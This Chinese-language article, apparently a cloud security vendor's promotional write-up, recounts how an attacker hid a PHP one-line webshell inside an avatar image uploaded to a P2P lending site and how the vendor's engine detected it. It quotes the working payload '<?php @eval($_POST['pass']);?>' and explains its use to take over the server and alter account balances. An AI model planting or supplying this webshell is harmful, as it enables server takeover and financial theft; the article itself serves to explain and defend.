P2P网贷网站上的魔术师和他命途多舛的马儿

安全圈的一位高人曾经说过，攻击就是一种“魔术”。有趣的是，我在某P2P网贷平台上，还真看到了被凭空“变”出来的钱。

P2P贷款是当下一种比较方便和实用的融资手段，为很多中小融资者解决了燃眉之急。P2P普遍的模式是由中间人提供牵线搭桥的平台，一边是有资金希望通过贷款让别人获取收益，另一边是有借款需求的人，双方通过中间人这个平台完成贷款交易。中间人一方面对双方背景进行确认，另一方面保证借贷业务的安全进行。P2P网贷就是依托网络即线上平台进行的P2P交易。

显而易见，P2P贷款业务过程中，由于涉及金钱交易，安全是非常重要的：贷出的一方需要确认借贷一方是诚信和可靠的，而借贷的一方需要确保整个借贷过程的安全，可以踏踏实实地拿到自己所需的资金。因此，作为交易中间人的P2P平台能否保证交易的安全就显得至关重要了。

一谈到P2P贷款的安全，公众的视线立刻就会被聚焦到交易双方的安全上，能否安全地完成信贷交易是大家最关心的。然而，P2P业务中关键的中间方即交易平台利益的保护，往往被大家所忽略。特别是对于一个网贷平台来说，尤是如此。

交易平台怎么可能利益受损？只要不存在欺诈行为，也就是多挣点、少挣点手续费的问题啊！对于一个P2P网贷平台来说，在正常的网络交易环境下，的确是这样。然而，由于网贷平台交易的特殊性——引入互联网络这个因素，使得交易环境变得比较复杂，容易受到其他因素的影响。

在互联网环境下的P2P网贷业务，和传统线下业务不一样的是，很可能出现除了交易双方、中间平台之外的第四者——攻击者。这个攻击者不请自来，而且他趋利性的目的往往比P2P贷款业务中的其他三方都更强烈和不择手段。

故事开始了。现在我们站在一个攻击者的角度上看P2P网贷业务，P2P业务交易双方固然是不错的攻击目标；然而，作为一个有经验的黑客来说，他很可能会选择中间人，即P2P网站平台。众所周知，P2P网贷业务追求的最终目的是多赢。如果攻击者掺合进来，就完全不同了——攻击者一旦获益，必然意味着正常P2P业务中的一方或多方利益受损。

平台业务中断和用户信息泄漏可能是大家最容易想到的业务威胁。网站被DDoS了，用户数据库被脱库了，这样的事件的确屡见报端。然而，P2P网贷平台是一个互联网金融平台，通俗一点说，是玩儿钱的。黑客一旦选择P2P网贷平台作为攻击对象，其目标往往不再单纯的是拒绝服务和用户信息的窃取，而是平台上的钱。

故事开始变得有意思了。安全圈有这么一句著名的话：Bad guy goes for where the money is （坏蛋总是跟着钱跑）。谈到P2P平台上的钱，交易双方账户里的钱无疑是最大的目标。

没错，账户里的钱。账户里的钱就是诱惑，是一座金山。

我这里有一个问题，账户里的钱从哪里来？这个貌似愚蠢的问题可能会被人笑话——当然是交易来的，要不就是充进去的，难道还是变出来的不成？

安全圈的一位高人曾经说过，攻击就是一种“魔术”。如果攻击者是一位“魔术师”呢？那么这账户里的钱怎么就不能变出来？

有趣的是，我在某P2P网贷平台上，还真看到了被凭空“变”出来的钱。下面的内容可能有些枯燥，不过，我尽量用人类的语言把它讲的通俗易懂。

如果我说上面的一大堆太空文字实际上一个图片，你会不会打我？不过，它的确是一个图片，那一大堆的乱码是编码后的图片代码。这个图片是由某位“魔术师”上传到某网贷平台上的头像。

看到最上面那段简短的文字了吗——<?php @eval($_POST['pass']);?>？稍微有些攻防基础的同学定会开心一笑：这不就是木马吗？没错儿，一句话木马。

这里顺带普及一下什么是木马。木马也叫后门，也称Webshell，“Web”是指开放web服务的网站服务器，“shell”意指黑客的目标，也就是取得对服务器某种程度上的操作权限。Webshell通常被称为攻击者通过端口获取网站服务器某种程度上的操作权限。Webshell大多为动态脚本文件，也被称为网站后门工具。

我们上面看到的就是php木马，精准一点说，php一句话图片马。这个马儿有什么用呢？废话少说，这个马儿一旦被攻击者上传到web服务器上，就可以帮助黑客获得web服务器控制权限。如果黑客通过这个马儿读取到数据库的连接文件，那么，你的数据库就是他的了。

故事到现在进入高潮。数据库丢了，那就是用户信息泄漏了？拜托，对于一个P2P网贷网站，人家费那么大劲（其实不用太费力气）就是为了那些用户信息？当然不是，他可以随意修改自己账户的金额，1百，1千，1万，10万。。。然后转账或提现。

到了见证“奇迹”的时刻：攻击者“变”出了钱，而网贷网站所有者最终要为这个“奇迹”埋单。在本文开始的时候，我们提到由于互联网环境的特殊性，作为网贷平台的中间人利益可能因网络攻击而遭受损失。上面的故事即提供了真实写照。

有的朋友会问，你这是在编故事吗？还真不是。上面的图片是前不久在阿里云某网贷网站上截获的真实马儿。攻击者自认为可以像绕过传统防护系统一样绕过阿里云的防护，上传马儿，不想却被云盾的服务器防护引擎发现，立刻报警。然后，我们就得到了这个马儿。之后，我们通过客服系统迅速通知了该网站的管理者，并提供了解决方案。

从攻击角度上来说，在此次攻击中，攻击者最大的“亮点”是把木马“放到”了图片里。攻击者这么做的目的就是绕过防护。传统的手段往往是对脚本代码进行过滤和检查，对于上传的图片很难做内容核查，往往只是通过文件头判断是否是图片。如果通过文件头判断是图片，那么就默认放过。不想马儿命途多舛，云盾在服务器系统层面的防护引擎凭借脚本防护规则准确发现并定位了这个木马。

“魔术师”机关算尽，无奈马儿最终没能逃出云盾的“手掌心”。P2P网贷网站所有者的利益得到了保护。

“魔术师和马儿”的故事到这里就要结束了。然而，攻击者和防护者围绕互联网金融的攻防大战却刚刚开始。P2P网贷和互联网金融正在迅猛发展，其间攻击者与网站防护者之间的攻防博弈还将继续。阿里云云盾也将不断面对攻击者的挑战。不过，这面经过十年打造的防护之盾必将在不断进行的攻防大战中变得更加牢固和强大。